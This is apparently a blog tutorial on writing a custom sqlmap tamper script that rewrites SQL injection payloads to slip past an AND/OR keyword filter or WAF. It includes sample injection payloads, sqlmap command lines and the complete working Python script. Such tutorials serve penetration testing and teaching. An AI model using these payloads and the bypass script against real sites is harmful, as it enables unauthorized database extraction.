How to write custom tamper scripts for sqlmap

Introduction

sqlmap is a very useful tool when you want to automate the exploitation of a SQL injection vulnerability and extract protected data from a web site. Often, in order to defend against this type of attack, developers introduce keyword filters and/or put a WAF (Web Application Firewall) in front of the application that blocks common SQL injection payloads.

Consider, for example, an application that rejects any input matching the regular expression /AND|OR/i. The first four payloads below contain one of the two keywords (in any letter case) and are blocked, while the last two, which use the || and && operators instead of the keywords, are not matched by the filter at all:

    Payload        Matched by /AND|OR/i?
    ' or 1=1#      yes
    ' and 1=2#     yes
    ' Or 5=5#      yes
    ' AnD 6=7#     yes
    ' || 1=1#      no
    ' && 1=2#      no

If we run sqlmap against such a target (the -v3 verbosity level makes sqlmap print the payloads it injects):

    sqlmap -u http://www.example.com?param=test -p param -v3

Some of the payloads sent by sqlmap. Note the presence of the AND keyword.

Writing the script

This is the template we will use for the tamper script; we will call it tamper.py:

    #!/usr/bin/env python

    from lib.core.enums import PRIORITY
    import re

    __priority__ = PRIORITY.NORMAL

    def dependencies():
        pass

    def tamper(payload, **kwargs):
        return payload

The available PRIORITY values are defined in the file /usr/share/sqlmap/lib/core/enums.py.

Now we replace the tamper function with one that actually rewrites the payload, substituting the OR and AND keywords with the || and && operators:

    def tamper(payload, **kwargs):
        """
        Replaces the OR and AND keywords with || and &&

        >>> tamper("' OR 1=1#")
        "' || 1=1#"
        """
        retVal = ""
        # \b matches a word boundary, so keywords embedded in longer words
        # (e.g. ORDER) are left alone. The patterns are case-sensitive,
        # which is fine because sqlmap emits these keywords in upper case.
        retVal = re.sub('\\bOR\\b', '||', payload)
        retVal = re.sub('\\bAND\\b', '&&', retVal)
        return retVal
  • Escape the backslash character "\" inside the Python string with another backslash, e.g. \b becomes \\b. If you do not do this, the Python interpreter treats "\b" as a string escape sequence instead of a literal backslash followed by "b", so the word-boundary anchor never reaches the regex engine and the pattern does not work as intended.
The complete script looks like this:

    #!/usr/bin/env python

    from lib.core.enums import PRIORITY
    import re

    __priority__ = PRIORITY.NORMAL

    def dependencies():
        pass

    def tamper(payload, **kwargs):
        """
        Replaces the OR and AND keywords with || and &&

        >>> tamper("' OR 1=1#")
        "' || 1=1#"
        """
        retVal = ""
        retVal = re.sub('\\bOR\\b', '||', payload)
        retVal = re.sub('\\bAND\\b', '&&', retVal)
        return retVal

We can now tell sqlmap to run every payload through the script with the --tamper option:

    sqlmap -u http://www.example.com?param=test -p param -v3 --tamper=<directory of your choice>/tamper.py

As you can see, the AND keyword that appeared in the earlier screenshot is now correctly replaced with the logical && operator.


Luca Di Domenico

Web security and Crypto. I'm a Software Security consultant and Freelance Web3 Developer. Follow me on Twitter! @luca_dd7